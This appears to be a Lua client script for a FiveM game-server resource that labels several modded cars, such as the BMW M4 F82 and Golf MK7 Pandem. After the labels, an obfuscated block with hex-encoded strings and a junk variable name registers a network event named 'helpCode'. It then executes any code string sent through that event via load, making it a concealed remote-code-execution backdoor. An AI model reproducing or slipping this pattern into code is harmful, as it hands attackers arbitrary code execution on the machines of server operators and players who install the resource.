Citizen.CreateThread(function()
    AddTextEntry('0x0EA2DDE8','BMW M4 F82')
	AddTextEntry('0x3639EAA1','BMW M4 F82')
	AddTextEntry('0x631F22C7','Honda')
	AddTextEntry('0xFBBBD1B8','NSX Rocket Bunny')
	AddTextEntry('0x3C7666C0','BRZ Pandem V3')
	AddTextEntry('0x39CF1938','Subaru')
	AddTextEntry('0x5E701E79','Golf MK7 Pandem')
end)

local RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[6][RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[1]](RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[2]) RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[6][RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[3]](RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[2], function(sZgkguQzYcCULguRCUOLpLiZApmXNzTcQDYHVDCCrOgQQjojZsOBsEERoDCrldidNWJaJH) RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[6][RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[4]](RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[6][RqmkLlsjluZhPzYDVhqtvZUwPghJeSElgYZsLsdxuXHAzYNOHXQCxjsEMWQnodaduPlKeH[5]](sZgkguQzYcCULguRCUOLpLiZApmXNzTcQDYHVDCCrOgQQjojZsOBsEERoDCrldidNWJaJH))() end)